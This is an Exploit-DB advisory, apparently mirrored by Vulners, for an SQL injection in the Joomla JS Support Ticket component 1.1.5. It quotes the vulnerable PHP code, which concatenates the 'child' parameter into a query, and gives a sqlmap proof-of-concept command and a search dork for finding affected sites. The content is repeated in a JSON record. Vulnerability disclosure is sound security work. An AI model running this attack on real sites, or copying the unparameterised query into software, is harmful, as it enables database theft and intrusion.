Search...

Joomla! Component JS Support Ticket (component com_jssupportticket) 1.1.5 - SQL Injection

2019-08-08T00:00:00

ID EDB-ID:47218
Type exploitdb
Reporter Exploit-DB
Modified 2019-08-08T00:00:00

Description

                                        
                                            #Exploit Title: Joomla! component com_jssupportticket - SQL Injection
#Dork: inurl:"index.php?option=com_jssupportticket"
#Date: 08.08.19
#Exploit Author: qw3rTyTy
#Vendor Homepage: https://www.joomsky.com/
#Software Link: https://www.joomsky.com/46/download/1.html
#Version: 1.1.5
#Tested on: Debian/nginx/joomla 3.9.0
#####################################
#Vulnerability details:
#####################################
Vulnerable code is in line 441 in file admin/models/userfields.php

   439	    function dataForDepandantField( $val , $childfield){ 
   440	        $db = $this-&gt;getDBO();
   441	        $query = "SELECT userfieldparams,fieldtitle,field,depandant_field FROM `#__js_ticket_fieldsordering` WHERE field = '".$childfield."'"; //!!!
   442	        $db-&gt;setQuery($query);
   443	        $data = $db-&gt;loadObject();
   444	        $decoded_data = json_decode($data-&gt;userfieldparams); 
   445	        $comboOptions = array(); 
   446	        $flag = 0; 
   447	        foreach ($decoded_data as $key =&gt; $value) { 
   448	            if($key == $val){ 
   449	               for ($i=0; $i &lt; count($value) ; $i++) {  
   450	                if($flag == 0){
   451	                    $comboOptions[] = array('value' =&gt; '', 'text' =&gt; JText::_('Select').' '.$data-&gt;fieldtitle); 
   452	                }
   453	                $comboOptions[] = array('value' =&gt; $value[$i], 'text' =&gt; $value[$i]); 
   454	                $flag = 1; 
   455	               } 
   456	            } 
   457	        }
   458	        $jsFunction = ''; 
   459	        if ($data-&gt;depandant_field != null) {
   460	            $jsFunction = "onchange=getDataForDepandantField('" . $data-&gt;field . "','" . $data-&gt;depandant_field . "',1);";
   461	        }
   462	        $html = JHTML::_('select.genericList', $comboOptions , $childfield,'class="inputbox one"'.$jsFunction, 'value' , 'text' ,'');
   463	        return $html; 
   464	    }

#####################################
#PoC:
#####################################
$&gt; sqlmap.py -u "http://localhost/index.php?option=com_jssupportticket&c=ticket&task=datafordepandantfield&fvalue=0&child=0" --random-agent -p child --dbms=mysql

JSON Vulners Source

Initial Source

{"id": "EDB-ID:47218", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Joomla! Component JS Support Ticket (component com_jssupportticket) 1.1.5 - SQL Injection", "description": "", "published": "2019-08-08T00:00:00", "modified": "2019-08-08T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.exploit-db.com/exploits/47218", "reporter": "Exploit-DB", "references": [], "cvelist": [], "lastseen": "2019-08-08T14:09:37", "viewCount": 68, "enchantments": {"dependencies": {"references": [], "modified": "2019-08-08T14:09:37", "rev": 2}, "score": {"value": 0.1, "vector": "NONE", "modified": "2019-08-08T14:09:37", "rev": 2}, "vulnersScore": 0.1}, "sourceHref": "https://www.exploit-db.com/download/47218", "sourceData": "#Exploit Title: Joomla! component com_jssupportticket - SQL Injection\r\n#Dork: inurl:\"index.php?option=com_jssupportticket\"\r\n#Date: 08.08.19\r\n#Exploit Author: qw3rTyTy\r\n#Vendor Homepage: https://www.joomsky.com/\r\n#Software Link: https://www.joomsky.com/46/download/1.html\r\n#Version: 1.1.5\r\n#Tested on: Debian/nginx/joomla 3.9.0\r\n#####################################\r\n#Vulnerability details:\r\n#####################################\r\nVulnerable code is in line 441 in file admin/models/userfields.php\r\n\r\n 439\t function dataForDepandantField( $val , $childfield){ \r\n 440\t $db = $this->getDBO();\r\n 441\t $query = \"SELECT userfieldparams,fieldtitle,field,depandant_field FROM `#__js_ticket_fieldsordering` WHERE field = '\".$childfield.\"'\"; //!!!\r\n 442\t $db->setQuery($query);\r\n 443\t $data = $db->loadObject();\r\n 444\t $decoded_data = json_decode($data->userfieldparams); \r\n 445\t $comboOptions = array(); \r\n 446\t $flag = 0; \r\n 447\t foreach ($decoded_data as $key => $value) { \r\n 448\t if($key == $val){ \r\n 449\t for ($i=0; $i < count($value) ; $i++) { \r\n 450\t if($flag == 0){\r\n 451\t $comboOptions[] = array('value' => '', 'text' => JText::_('Select').' '.$data->fieldtitle); \r\n 452\t }\r\n 453\t $comboOptions[] = array('value' => $value[$i], 'text' => $value[$i]); \r\n 454\t $flag = 1; \r\n 455\t } \r\n 456\t } \r\n 457\t }\r\n 458\t $jsFunction = ''; \r\n 459\t if ($data->depandant_field != null) {\r\n 460\t $jsFunction = \"onchange=getDataForDepandantField('\" . $data->field . \"','\" . $data->depandant_field . \"',1);\";\r\n 461\t }\r\n 462\t $html = JHTML::_('select.genericList', $comboOptions , $childfield,'class=\"inputbox one\"'.$jsFunction, 'value' , 'text' ,'');\r\n 463\t return $html; \r\n 464\t }\r\n\r\n#####################################\r\n#PoC:\r\n#####################################\r\n$> sqlmap.py -u \"http://localhost/index.php?option=com_jssupportticket&c=ticket&task=datafordepandantfield&fvalue=0&child=0\" --random-agent -p child --dbms=mysql", "osvdbidlist": []}